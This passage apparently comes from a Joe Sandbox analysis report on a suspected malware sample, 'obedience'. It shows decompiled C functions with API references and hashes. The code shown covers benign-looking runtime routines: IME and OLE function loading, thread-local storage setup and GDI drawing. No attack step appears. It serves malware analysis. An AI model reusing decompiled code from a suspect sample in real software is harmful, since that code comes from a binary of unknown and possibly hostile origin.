      				}
      				return _t17;
      			}

      • Instruction addresses for the C-code listing above: 0x004273f2, 0x004273f5, 0x004273f8, 0x004273fc, 0x00427401, 0x00427407, 0x00427408, 0x00427412, 0x00427425, 0x0042742e, 0x00427436, 0x00427439, 0x00427439, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00427414, 0x00427414, 0x00427417, 0x00427419, 0x0042741c, 0x0042741f, 0x0042741f, 0x00000000, 0x00427414, 0x00427440

      APIs
      • GetSystemInfo.KERNEL32(?), ref: 004273FC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: InfoSystem
      • String ID:
      • API String ID: 31276548-0
      • Opcode ID: c37d24fa094edddc0bbc2a3042128570d5d8995d4bf8c6c6d2ae6a62543045b3
      • Instruction ID: 4eb94634b245c3398a57fc3eb680f7293f91554cf07e2667103df5b9ea9e6c6f
      • Opcode Fuzzy Hash: c37d24fa094edddc0bbc2a3042128570d5d8995d4bf8c6c6d2ae6a62543045b3
      • Instruction Fuzzy Hash: B2F0C271E081189BCB10EF98D48889CFBB4FA563017D082AAD408E7342EB38A954CB95
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E0044FBC8() {
      				int _v8;
      				intOrPtr _t4;
      				struct HINSTANCE__* _t11;
      				struct HINSTANCE__* _t13;
      				struct HINSTANCE__* _t15;
      				struct HINSTANCE__* _t17;
      				struct HINSTANCE__* _t19;
      				struct HINSTANCE__* _t21;
      				struct HINSTANCE__* _t23;
      				struct HINSTANCE__* _t25;
      				struct HINSTANCE__* _t27;
      				struct HINSTANCE__* _t29;
      				intOrPtr _t40;
      				intOrPtr _t42;
      				intOrPtr _t44;
      
      				_t42 = _t44;
      				_t4 =  *0x48f9e0; // 0x490740
      				if( *((char*)(_t4 + 0xc)) == 0) {
      					return _t4;
      				} else {
      					_v8 = SetErrorMode(0x8000);
      					_push(_t42);
      					_push(0x44fd2e);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t44;
      					if( *0x490b30 == 0) {
      						 *0x490b30 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
      					}
      					if( *0x48ed04 == 0) {
      						 *0x48ed04 = LoadLibraryA("imm32.dll");
      						if( *0x48ed04 != 0) {
      							_t11 =  *0x48ed04; // 0x0
      							 *0x490b34 = GetProcAddress(_t11, "ImmGetContext");
      							_t13 =  *0x48ed04; // 0x0
      							 *0x490b38 = GetProcAddress(_t13, "ImmReleaseContext");
      							_t15 =  *0x48ed04; // 0x0
      							 *0x490b3c = GetProcAddress(_t15, "ImmGetConversionStatus");
      							_t17 =  *0x48ed04; // 0x0
      							 *0x490b40 = GetProcAddress(_t17, "ImmSetConversionStatus");
      							_t19 =  *0x48ed04; // 0x0
      							 *0x490b44 = GetProcAddress(_t19, "ImmSetOpenStatus");
      							_t21 =  *0x48ed04; // 0x0
      							 *0x490b48 = GetProcAddress(_t21, "ImmSetCompositionWindow");
      							_t23 =  *0x48ed04; // 0x0
      							 *0x490b4c = GetProcAddress(_t23, "ImmSetCompositionFontA");
      							_t25 =  *0x48ed04; // 0x0
      							 *0x490b50 = GetProcAddress(_t25, "ImmGetCompositionStringA");
      							_t27 =  *0x48ed04; // 0x0
      							 *0x490b54 = GetProcAddress(_t27, "ImmIsIME");
      							_t29 =  *0x48ed04; // 0x0
      							 *0x490b58 = GetProcAddress(_t29, "ImmNotifyIME");
      						}
      					}
      					_pop(_t40);
      					 *[fs:eax] = _t40;
      					_push(0x44fd35);
      					return SetErrorMode(_v8);
      				}
      			}

      • Instruction addresses for the C-code listing above: 0x0044fbc9, 0x0044fbcd, 0x0044fbd6, 0x0044fd38, 0x0044fbdc, 0x0044fbe6, 0x0044fbeb, 0x0044fbec, 0x0044fbf1, 0x0044fbf4, 0x0044fbfe, 0x0044fc17, 0x0044fc17, 0x0044fc23, 0x0044fc33, 0x0044fc3f, 0x0044fc4a, 0x0044fc55, 0x0044fc5f, 0x0044fc6a, 0x0044fc74, 0x0044fc7f, 0x0044fc89, 0x0044fc94, 0x0044fc9e, 0x0044fca9, 0x0044fcb3, 0x0044fcbe, 0x0044fcc8, 0x0044fcd3, 0x0044fcdd, 0x0044fce8, 0x0044fcf2, 0x0044fcfd, 0x0044fd07, 0x0044fd12, 0x0044fd12, 0x0044fc3f, 0x0044fd19, 0x0044fd1c, 0x0044fd1f, 0x0044fd2d, 0x0044fd2d

      APIs
      • SetErrorMode.KERNEL32(00008000), ref: 0044FBE1
      • GetModuleHandleA.KERNEL32(USER32,00000000,0044FD2E,?,00008000), ref: 0044FC05
      • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044FC12
      • LoadLibraryA.KERNEL32(imm32.dll,00000000,0044FD2E,?,00008000), ref: 0044FC2E
      • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044FC50
      • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 0044FC65
      • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044FC7A
      • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044FC8F
      • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 0044FCA4
      • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 0044FCB9
      • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044FCCE
      • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044FCE3
      • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044FCF8
      • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0044FD0D
      • SetErrorMode.KERNEL32(?,0044FD35,00008000), ref: 0044FD28
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
      • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
      • API String ID: 3397921170-3950384806
      • Opcode ID: 374a837e80c477fb98822c23aae7332e2a59bf68874875d1c8d2069295e67134
      • Instruction ID: 4bfc3634d294958175ea73f6866045fa44debc043b9f55035c6037df43ab569d
      • Opcode Fuzzy Hash: 374a837e80c477fb98822c23aae7332e2a59bf68874875d1c8d2069295e67134
      • Instruction Fuzzy Hash: 213133F1D043056EE700EFA2FD5AE1A77E4E714708F20483BB505972A2D6BD68088B5E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040F2CC() {
      				struct HINSTANCE__* _v8;
      				intOrPtr _t46;
      				void* _t91;
      
      				_v8 = GetModuleHandleA("oleaut32.dll");
      				 *0x4907a0 = E0040F294("VariantChangeTypeEx", E0040EE30, _t91);
      				 *0x4907a4 = E0040F294("VarNeg", E0040EE60, _t91);
      				 *0x4907a8 = E0040F294("VarNot", E0040EE60, _t91);
      				 *0x4907ac = E0040F294("VarAdd", E0040EE6C, _t91);
      				 *0x4907b0 = E0040F294("VarSub", E0040EE6C, _t91);
      				 *0x4907b4 = E0040F294("VarMul", E0040EE6C, _t91);
      				 *0x4907b8 = E0040F294("VarDiv", E0040EE6C, _t91);
      				 *0x4907bc = E0040F294("VarIdiv", E0040EE6C, _t91);
      				 *0x4907c0 = E0040F294("VarMod", E0040EE6C, _t91);
      				 *0x4907c4 = E0040F294("VarAnd", E0040EE6C, _t91);
      				 *0x4907c8 = E0040F294("VarOr", E0040EE6C, _t91);
      				 *0x4907cc = E0040F294("VarXor", E0040EE6C, _t91);
      				 *0x4907d0 = E0040F294("VarCmp", E0040EE78, _t91);
      				 *0x4907d4 = E0040F294("VarI4FromStr", E0040EE84, _t91);
      				 *0x4907d8 = E0040F294("VarR4FromStr", E0040EEF0, _t91);
      				 *0x4907dc = E0040F294("VarR8FromStr", E0040EF5C, _t91);
      				 *0x4907e0 = E0040F294("VarDateFromStr", E0040EFC8, _t91);
      				 *0x4907e4 = E0040F294("VarCyFromStr", E0040F034, _t91);
      				 *0x4907e8 = E0040F294("VarBoolFromStr", E0040F0A0, _t91);
      				 *0x4907ec = E0040F294("VarBstrFromCy", E0040F120, _t91);
      				 *0x4907f0 = E0040F294("VarBstrFromDate", E0040F190, _t91);
      				_t46 = E0040F294("VarBstrFromBool", E0040F200, _t91);
      				 *0x4907f4 = _t46;
      				return _t46;
      			}

      • Instruction addresses for the C-code listing above: 0x0040f2da, 0x0040f2ee, 0x0040f304, 0x0040f31a, 0x0040f330, 0x0040f346, 0x0040f35c, 0x0040f372, 0x0040f388, 0x0040f39e, 0x0040f3b4, 0x0040f3ca, 0x0040f3e0, 0x0040f3f6, 0x0040f40c, 0x0040f422, 0x0040f438, 0x0040f44e, 0x0040f464, 0x0040f47a, 0x0040f490, 0x0040f4a6, 0x0040f4b6, 0x0040f4bc, 0x0040f4c3

      APIs
      • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F2D5
        • Part of subcall function 0040F294: GetProcAddress.KERNEL32(00000000), ref: 0040F2B2
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
      • API String ID: 1646373207-1918263038
      • Opcode ID: 58de1dade71f53d0899f0e8fbc1cbb2eb4c9aef06b4d33c591fb82ccc709756d
      • Instruction ID: 28b5129e273cb11d93a915464337d558d712fca8657309680c3e7c11d0cc13c2
      • Opcode Fuzzy Hash: 58de1dade71f53d0899f0e8fbc1cbb2eb4c9aef06b4d33c591fb82ccc709756d
      • Instruction Fuzzy Hash: DA412D655083046ED324ABAEB80142677C9D6547243A0C4BFB404BBFD6DB3D7C4A8E6D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 62%
      			E6ED98473(void* __ebx, void* __edx) {
      				void* __edi;
      				void* __esi;
      				_Unknown_base(*)()* _t7;
      				long _t10;
      				void* _t11;
      				int _t12;
      				void* _t14;
      				void* _t15;
      				void* _t16;
      				void* _t18;
      				intOrPtr _t21;
      				long _t26;
      				void* _t30;
      				void* _t35;
      				struct HINSTANCE__* _t36;
      				intOrPtr* _t37;
      				void* _t40;
      				intOrPtr* _t42;
      				void* _t43;
      
      				_t35 = __edx;
      				_t30 = __ebx;
      				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
      				if(_t36 != 0) {
      					 *0x6edb0880 = GetProcAddress(_t36, "FlsAlloc");
      					 *0x6edb0884 = GetProcAddress(_t36, "FlsGetValue");
      					 *0x6edb0888 = GetProcAddress(_t36, "FlsSetValue");
      					_t7 = GetProcAddress(_t36, "FlsFree");
      					__eflags =  *0x6edb0880;
      					_t40 = TlsSetValue;
      					 *0x6edb088c = _t7;
      					if( *0x6edb0880 == 0) {
      						L6:
      						 *0x6edb0884 = TlsGetValue;
      						 *0x6edb0880 = 0x6ed98115;
      						 *0x6edb0888 = _t40;
      						 *0x6edb088c = TlsFree;
      					} else {
      						__eflags =  *0x6edb0884;
      						if( *0x6edb0884 == 0) {
      							goto L6;
      						} else {
      							__eflags =  *0x6edb0888;
      							if( *0x6edb0888 == 0) {
      								goto L6;
      							} else {
      								__eflags = _t7;
      								if(_t7 == 0) {
      									goto L6;
      								}
      							}
      						}
      					}
      					_t10 = TlsAlloc();
      					 *0x6edafa20 = _t10;
      					__eflags = _t10 - 0xffffffff;
      					if(_t10 == 0xffffffff) {
      						L15:
      						_t11 = 0;
      						__eflags = 0;
      					} else {
      						_t12 = TlsSetValue(_t10,  *0x6edb0884);
      						__eflags = _t12;
      						if(_t12 == 0) {
      							goto L15;
      						} else {
      							E6ED967F1();
      							_t42 = __imp__EncodePointer;
      							_t14 =  *_t42( *0x6edb0880);
      							 *0x6edb0880 = _t14;
      							_t15 =  *_t42( *0x6edb0884);
      							 *0x6edb0884 = _t15;
      							_t16 =  *_t42( *0x6edb0888);
      							 *0x6edb0888 = _t16;
      							 *0x6edb088c =  *_t42( *0x6edb088c);
      							_t18 = L6ED9990E();
      							__eflags = _t18;
      							if(_t18 == 0) {
      								L14:
      								L6ED98152();
      								goto L15;
      							} else {
      								_t37 = __imp__DecodePointer;
      								_t21 =  *((intOrPtr*)( *_t37()))( *0x6edb0880, E6ED982D6);
      								 *0x6edafa1c = _t21;
      								__eflags = _t21 - 0xffffffff;
      								if(_t21 == 0xffffffff) {
      									goto L14;
      								} else {
      									_t43 = E6ED99841(1, 0x214);
      									__eflags = _t43;
      									if(_t43 == 0) {
      										goto L14;
      									} else {
      										__eflags =  *((intOrPtr*)( *_t37()))( *0x6edb0888,  *0x6edafa1c, _t43);
      										if(__eflags == 0) {
      											goto L14;
      										} else {
      											_push(0);
      											_push(_t43);
      											L6ED9818F(_t30, _t35, _t37, _t43, __eflags);
      											_t26 = GetCurrentThreadId();
      											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
      											 *_t43 = _t26;
      											_t11 = 1;
      										}
      									}
      								}
      							}
      						}
      					}
      					return _t11;
      				} else {
      					L6ED98152();
      					return 0;
      				}
      			}

      • Instruction addresses for the C-code listing above: 0x6ed98473, 0x6ed98473, 0x6ed98481, 0x6ed98485, 0x6ed984a5, 0x6ed984b2, 0x6ed984bf, 0x6ed984c4, 0x6ed984c6, 0x6ed984cd, 0x6ed984d3, 0x6ed984d8, 0x6ed984f0, 0x6ed984f5, 0x6ed984ff, 0x6ed98509, 0x6ed9850f, 0x6ed984da, 0x6ed984da, 0x6ed984e1, 0x00000000, 0x6ed984e3, 0x6ed984e3, 0x6ed984ea, 0x00000000, 0x6ed984ec, 0x6ed984ec, 0x6ed984ee, 0x00000000, 0x00000000, 0x6ed984ee, 0x6ed984ea, 0x6ed984e1, 0x6ed98514, 0x6ed9851a, 0x6ed9851f, 0x6ed98522, 0x6ed985e9, 0x6ed985e9, 0x6ed985e9, 0x6ed98528, 0x6ed9852f, 0x6ed98531, 0x6ed98533, 0x00000000, 0x6ed98539, 0x6ed98539, 0x6ed98544, 0x6ed9854a, 0x6ed98552, 0x6ed98557, 0x6ed9855f, 0x6ed98564, 0x6ed9856c, 0x6ed98573, 0x6ed98578, 0x6ed9857d, 0x6ed9857f, 0x6ed985e4, 0x6ed985e4, 0x00000000, 0x6ed98581, 0x6ed98581, 0x6ed98594, 0x6ed98596, 0x6ed9859b, 0x6ed9859e, 0x00000000, 0x6ed985a0, 0x6ed985ac, 0x6ed985b0, 0x6ed985b2, 0x00000000, 0x6ed985b4, 0x6ed985c5, 0x6ed985c7, 0x00000000, 0x6ed985c9, 0x6ed985c9, 0x6ed985cb, 0x6ed985cc, 0x6ed985d3, 0x6ed985d9, 0x6ed985dd, 0x6ed985e1, 0x6ed985e1, 0x6ed985c7, 0x6ed985b2, 0x6ed9859e, 0x6ed9857f, 0x6ed98533, 0x6ed985ed, 0x6ed98487, 0x6ed98487, 0x6ed9848f, 0x6ed9848f

      APIs
      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9847B
      • __mtterm.LIBCMT ref: 6ED98487
        • Part of subcall function 6ED98152: DecodePointer.KERNEL32(00000005,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98163
        • Part of subcall function 6ED98152: TlsFree.KERNEL32(00000020,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9817D
        • Part of subcall function 6ED98152: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED99975
        • Part of subcall function 6ED98152: _free.LIBCMT ref: 6ED99978
        • Part of subcall function 6ED98152: DeleteCriticalSection.KERNEL32(00000020,?,?,6ED97458,6ED9743E,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9999F
      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6ED9849D
      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6ED984AA
      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6ED984B7
      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6ED984C4
      • TlsAlloc.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98514
      • TlsSetValue.KERNEL32(00000000,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9852F
      • __init_pointers.LIBCMT ref: 6ED98539
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED9854A
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98557
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98564
      • EncodePointer.KERNEL32(?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98571
      • DecodePointer.KERNEL32(Function_000082D6,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED98592
      • __calloc_crt.LIBCMT ref: 6ED985A7
      • DecodePointer.KERNEL32(00000000,?,?,6ED97395,6EDAA0A0,00000008,6ED97529,?,?,?,6EDAA0C0,0000000C,6ED975E4,?), ref: 6ED985C1
      • GetCurrentThreadId.KERNEL32 ref: 6ED985D3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
      • API String ID: 3698121176-3819984048
      • Opcode ID: 93f15c975f6924734934168e9766d48556946d640a21cbe46a4281b267be9624
      • Instruction ID: b646a616cd99eca07b226c7d31acd3d8e1a2232270e2b455aa5ed5ac8db6e13d
      • Opcode Fuzzy Hash: 93f15c975f6924734934168e9766d48556946d640a21cbe46a4281b267be9624
      • Instruction Fuzzy Hash: 3F3180B9810B01DAEF95BFB8CD0460D3AE5EF46790B10052AE424DB290FBB0C247EF90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 52%
      			E0042709C(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
      				int _v8;
      				int _v12;
      				char _v13;
      				struct HDC__* _v20;
      				void* _v24;
      				void* _v28;
      				long _v32;
      				long _v36;
      				intOrPtr _v40;
      				intOrPtr* _t78;
      				intOrPtr _t87;
      				struct HDC__* _t88;
      				intOrPtr _t91;
      				struct HDC__* _t92;
      				struct HDC__* _t135;
      				int _t162;
      				intOrPtr _t169;
      				intOrPtr _t171;
      				struct HDC__* _t173;
      				int _t175;
      				void* _t177;
      				void* _t178;
      				intOrPtr _t179;
      
      				_t177 = _t178;
      				_t179 = _t178 + 0xffffffdc;
      				_v12 = __ecx;
      				_v8 = __edx;
      				_t173 = __eax;
      				_t175 = _a16;
      				_t162 = _a20;
      				_v13 = 1;
      				_t78 =  *0x48f9d4; // 0x48e0c8
      				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
      					_v40 = 0;
      					_push(0);
      					L00407280();
      					_v20 = E00426EF8(0);
      					_push(_t177);
      					_push(0x42731c);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t179;
      					_push(_t175);
      					_push(_t162);
      					_push(_a32);
      					L00407278();
      					_v24 = E00426EF8(_a32);
      					_v28 = SelectObject(_v20, _v24);
      					_push(0);
      					_t87 =  *0x490890; // 0xc0809fd
      					_push(_t87);
      					_t88 = _a32;
      					_push(_t88);
      					L00407420();
      					_v40 = _t88;
      					_push(0);
      					_push(_v40);
      					_push(_a32);
      					L00407420();
      					if(_v40 == 0) {
      						_push(0xffffffff);
      						_t91 =  *0x490890; // 0xc0809fd
      						_push(_t91);
      						_t92 = _v20;
      						_push(_t92);
      						L00407420();
      						_v40 = _t92;
      					} else {
      						_push(0xffffffff);
      						_push(_v40);
      						_t135 = _v20;
      						_push(_t135);
      						L00407420();
      						_v40 = _t135;
      					}
      					_push(_v20);
      					L004073F0();
      					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
      					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
      					_v32 = SetTextColor(_t173, 0);
      					_v36 = SetBkColor(_t173, 0xffffff);
      					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
      					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
      					SetTextColor(_t173, _v32);
      					SetBkColor(_t173, _v36);
      					if(_v28 != 0) {
      						SelectObject(_v20, _v28);
      					}
      					DeleteObject(_v24);
      					_pop(_t169);
      					 *[fs:eax] = _t169;
      					_push(0x427323);
      					if(_v40 != 0) {
      						_push(0);
      						_push(_v40);
      						_push(_v20);
      						L00407420();
      					}
      					return DeleteDC(_v20);
      				} else {
      					_push(1);
      					_push(1);
      					_push(_a32);
      					L00407278();
      					_v24 = E00426EF8(_a32);
      					_v24 = SelectObject(_a12, _v24);
      					_push(_t177);
      					_push(0x42716f);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t179;
      					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A7C(0xaa0029, 0xcc0020));
      					_pop(_t171);
      					 *[fs:eax] = _t171;
      					_push(0x427323);
      					_v24 = SelectObject(_a12, _v24);
      					return DeleteObject(_v24);
      				}
      			}

      • Instruction addresses for the C-code listing above: 0x0042709d, 0x0042709f, 0x004270a5, 0x004270a8, 0x004270ab, 0x004270ad, 0x004270b0, 0x004270b3, 0x004270b7, 0x004270bf, 0x00427178, 0x0042717b, 0x0042717d, 0x00427187, 0x0042718c, 0x0042718d, 0x00427192, 0x00427195, 0x00427198, 0x00427199, 0x0042719d, 0x0042719e, 0x004271a8, 0x004271b8, 0x004271bb, 0x004271bd, 0x004271c2, 0x004271c3, 0x004271c6, 0x004271c7, 0x004271cc, 0x004271cf, 0x004271d4, 0x004271d8, 0x004271d9, 0x004271e2, 0x004271f8, 0x004271fa, 0x004271ff, 0x00427200, 0x00427203, 0x00427204, 0x00427209, 0x004271e4, 0x004271e4, 0x004271e9, 0x004271ea, 0x004271ed, 0x004271ee, 0x004271f3, 0x004271f3, 0x0042720f, 0x00427210, 0x00427232, 0x00427254, 0x00427261, 0x0042726f, 0x00427296, 0x004272bb, 0x004272c5, 0x004272cf, 0x004272d8, 0x004272e2, 0x004272e2, 0x004272eb, 0x004272f2, 0x004272f5, 0x004272f8, 0x00427301, 0x00427303, 0x00427308, 0x0042730c, 0x0042730d, 0x0042730d, 0x0042731b, 0x004270d7, 0x004270d7, 0x004270d9, 0x004270de, 0x004270df, 0x004270e9, 0x004270f9, 0x004270fe, 0x004270ff, 0x00427104, 0x00427107, 0x00427143, 0x0042714a, 0x0042714d, 0x00427150, 0x00427162, 0x0042716e, 0x0042716e

      APIs
      • 73BEA520.GDI32(?,00000001,00000001), ref: 004270DF
      • SelectObject.GDI32(?,?), ref: 004270F4
      • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0042716F,?,?), ref: 00427143
      • SelectObject.GDI32(?,?), ref: 0042715D
      • DeleteObject.GDI32(?), ref: 00427169
      • 73BEA590.GDI32(00000000), ref: 0042717D
      • 73BEA520.GDI32(?,?,?,00000000,0042731C,?,00000000), ref: 0042719E
      • SelectObject.GDI32(?,?), ref: 004271B3
      • 73BEB410.GDI32(?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C,?,00000000), ref: 004271C7
      • 73BEB410.GDI32(?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C,?,00000000), ref: 004271D9
      • 73BEB410.GDI32(?,00000000,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C), ref: 004271EE
      • 73BEB410.GDI32(?,0C0809FD,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000,0042731C), ref: 00427204
      • 73BEB150.GDI32(?,?,0C0809FD,000000FF,?,?,00000000,?,0C0809FD,00000000,?,?,?,?,?,00000000), ref: 00427210
      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00427232
      • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00427254
      • SetTextColor.GDI32(?,00000000), ref: 0042725C
